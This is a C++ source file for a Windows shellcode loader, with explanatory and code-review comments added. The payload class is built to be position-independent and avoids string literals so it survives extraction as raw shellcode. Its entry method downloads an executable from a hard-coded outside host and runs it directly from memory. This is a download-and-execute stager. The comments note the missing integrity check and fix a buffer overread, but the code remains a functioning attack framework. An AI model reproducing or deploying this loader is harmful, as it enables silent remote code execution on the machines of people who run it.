#include "ShellCode.h"
// Shellcode start marker: control is transferred from here to the real entry function, Strat().
#ifdef _WIN64
// Start marker of the shellcode region: the bytes between mmLoaderSCStart and
// mmLoaderSCEnd are presumably what gets extracted as the final shellcode, so
// this function must be emitted first in .text. That relies on the linker
// keeping source order and not folding or reordering functions (e.g. /OPT:ICF,
// /Gy, LTCG) -- confirm in the build settings.
// x64 MSVC has no inline asm, so the marker is a plain function that calls the
// real entry, Strat() (declared elsewhere; defined later in this file).
VOID mmLoaderSCStart(){
    Strat();
#else
// x86: naked function (compiler emits no prologue/epilogue), so the shellcode
// begins executing at its very first byte and tail-jumps into Strat() with
// the caller's stack untouched. Strat() never returns here.
VOID _declspec(naked) mmLoaderSCStart()
{
    __asm jmp Strat;
#endif
}
// Class that is compiled into shellcode; all payload logic is written inside it.
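// Class that is compiled into position-independent shellcode. Everything the
// payload needs lives here: the resolved API table (fn), scratch buffers and
// the entry method StartSCode(). The existing code avoids string literals
// (strings are built as char arrays on the stack) and routes every API call
// through the fn table -- presumably so the extracted bytes carry no .rdata
// references or import relocations; keep to that pattern when editing.
class RmExecute
{
public:
    // Helper implementations (HttpDownload, RunPortableExecutable, ...) are
    // pulled into the class body so they can use the members below.
#include"Tool.h"

public:
    // Stand-ins for global state: the shellcode has no data section, so what
    // would normally be globals are kept as members of this object.
    Functions fn;        // API function-pointer table, filled by Initfunctions()
    char s_runexe[260];  // run-target name, NUL-terminated (260 == MAX_PATH)
    char *newbuff;       // download buffer: filled by HttpDownload, released via fn.fnfree

public:
    // Resolve the API table and initialise the scratch members.
    RmExecute()
    {
        newbuff = NULL;
        Initfunctions(&fn);

        // Built as a char array rather than a string literal so the bytes
        // stay inside the code region.
        char runexe[] = { 'A', 'A', '\0' };
        // Copy only the bytes that exist. The previous code copied 260 bytes
        // out of this 3-byte array, reading 257 bytes past the end of the
        // stack object (CWE-126) and filling s_runexe with stack garbage.
        fn.fnmemcpy(s_runexe, runexe, sizeof(runexe));
    }

    // Nothing to release: newbuff is freed at the end of StartSCode().
    ~RmExecute()
    {
    }

public:
    // Entry point of the payload -- the equivalent of main() in a normal
    // program: fetch a PE image over HTTPS into newbuff and run it from memory.
    void __stdcall StartSCode()
    {
        wchar_t host[] = { '9', 'b', 'i', 'e', '.', 'o', 'r', 'g', '\0' };
        wchar_t path[] = { '/', 'c', 'm', 'd', '.', 'e', 'x', 'e', '\0' };

        // Re-resolve the API table right before use. The original author notes
        // that otherwise the addresses are lost; the reason is not visible here,
        // so the call is kept.
        Initfunctions(&fn);

        // Downloads into newbuff. The return value is taken to be the payload
        // size, <= 0 on failure -- confirm against HttpDownload in Tool.h.
        int size = HttpDownload(host, path, 443, TRUE);

        // SECURITY: the downloaded image is executed without any integrity
        // check (no hash, no signature). Whoever controls the host, the DNS
        // answer or the TLS path decides what code runs here; verify the image
        // before handing it to RunPortableExecutable() in any real deployment.
        // Also do not run on a failed/empty download: RunPortableExecutable()
        // would otherwise parse a NULL or undersized buffer.
        if (size > 0 && newbuff != NULL) {
            RunPortableExecutable();
        }

        // Release the buffer allocated by HttpDownload and clear the pointer
        // so a later free cannot hit it twice.
        fn.fnfree(newbuff);
        newbuff = NULL;
    }
};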
// Shellcode entry function
// Real shellcode entry; mmLoaderSCStart jumps (x86) or calls (x64) into here.
// Shellcode has no writable data section, so the state that would normally be
// global lives in a stack-allocated RmExecute object: constructing it resolves
// the API table, StartSCode() does the work, and the object is torn down when
// the full expression ends.
void __stdcall Strat()
{
    RmExecute().StartSCode();
}
#ifdef _WIN64
// End marker of the shellcode region (see mmLoaderSCStart): its address is
// presumably used as the exclusive upper bound of the bytes to extract, so it
// must be emitted directly after Strat() in .text. An empty function is a
// candidate for COMDAT folding/reordering by the linker -- confirm that the
// build disables that (e.g. /OPT:NOICF) or the extracted length is wrong.
void mmLoaderSCEnd()
{
#else
// x86 end marker: naked, so the function body is exactly the bytes written
// here. A single int 3 (breakpoint trap) presumably catches control running
// off the end of the shellcode instead of executing whatever follows.
void __declspec(naked) mmLoaderSCEnd()
{
    __asm int 3;
#endif
}
|